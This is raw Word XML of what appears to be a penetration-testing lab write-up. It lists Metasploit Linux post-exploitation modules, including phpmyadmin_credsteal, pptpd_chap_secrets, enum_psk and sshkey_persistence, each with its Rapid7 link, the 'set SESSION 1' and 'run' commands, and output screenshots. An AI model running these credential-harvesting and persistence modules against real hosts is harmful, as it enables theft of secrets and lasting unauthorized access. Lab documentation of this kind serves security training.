      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381CAC79" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F117F70" w14:textId="5637CE1A" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EAA9BE" wp14:editId="7CFA4E23">
            <wp:extent cx="5816899" cy="2222614"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1035586082" name="Picture 3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6082" name="Picture 35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D198" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 5: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enum_psk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D3F68E6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https://www.rapid7.com/db/modules/post/linux/gather/enum_psk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7E744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485FFFE2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enum_psk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25E85553" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E0AEC" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495DB4B" w14:textId="7E2B2A03" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F7A914" wp14:editId="74B91717">
            <wp:extent cx="5912154" cy="3873699"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="802687982" name="Picture 3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7982" name="Picture 36" descr="A computer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CB19" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module 6: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enum_xchat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D1E6BC8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https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63198822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65886E32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enum_xchat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DF858F1" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78FB26" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set XCHAT true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47ECB2" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150474C" w14:textId="49039778" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D6AB44" wp14:editId="447D7C92">
            <wp:extent cx="5753396" cy="3149762"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9541333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3344" name="Picture 9541333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1855" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 7: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phpmyadmin_credsteal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13CE5A09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https://www.rapid7.com/db/modules/post/linux/gather/phpmyadmin_credsteal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60C6FC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11BEA8D6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phpmyadmin_credsteal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A5FD3CF" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DA3A3" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B6C39" w14:textId="4C454BD1" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="197A722F" wp14:editId="0AC6C816">
            <wp:extent cx="5880402" cy="3359323"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1094295059" name="Picture 3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5059" name="Picture 38" descr="A computer screen shot of a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8F89" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 8: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pptpd_chap_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E6669E3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https://www.rapid7.com/db/modules/post/linux/gather/pptpd_chap_secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9119D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6325A04E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/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>pptpd_chap_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3583BC4F" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBF2BA" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB7CC0" w14:textId="0CC3CE30" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC9C374" wp14:editId="78FE6948">
            <wp:extent cx="5797848" cy="3264068"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196008942" name="Picture 39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8942" name="Picture 39" descr="A computer screen shot of a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878D" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>sshkey_persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2275EFBC" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> https://www.rapid7.com/db/modules/post/linux/manage/sshkey_persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217ACC07" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1DC04" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>sshkey_persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F927D7E" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E4FDF3" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF2F70" w14:textId="5EA366BE" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA96E80" wp14:editId="160E6B49">
            <wp:extent cx="5816899" cy="2470277"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1421630911" name="Picture 4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0911" name="Picture 40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2798" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRDefault="00DC027B"/>
    <w:sectPr w:rsidR="00DC0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B03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A59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84225"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6637BE"/>
    <w:lvl w:ilvl="0" w:tplc="7B92F3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C48CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="479A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617060">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="510070180">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="58722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7A"/>
    <w:rsid w:val="0004724B"/>
    <w:rsid w:val="00184D59"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="0056524F"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00C7447A"/>
    <w:rsid w:val="00CD6056"/>
    <w:rsid w:val="00DC027B"/>
    <w:rsid w:val="00ED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26B8C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{25C4FDB6-E271-4BE2-B286-6D93FC22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633</Words>
  <Characters>3483</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>316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2025-10-17T09:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T10:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>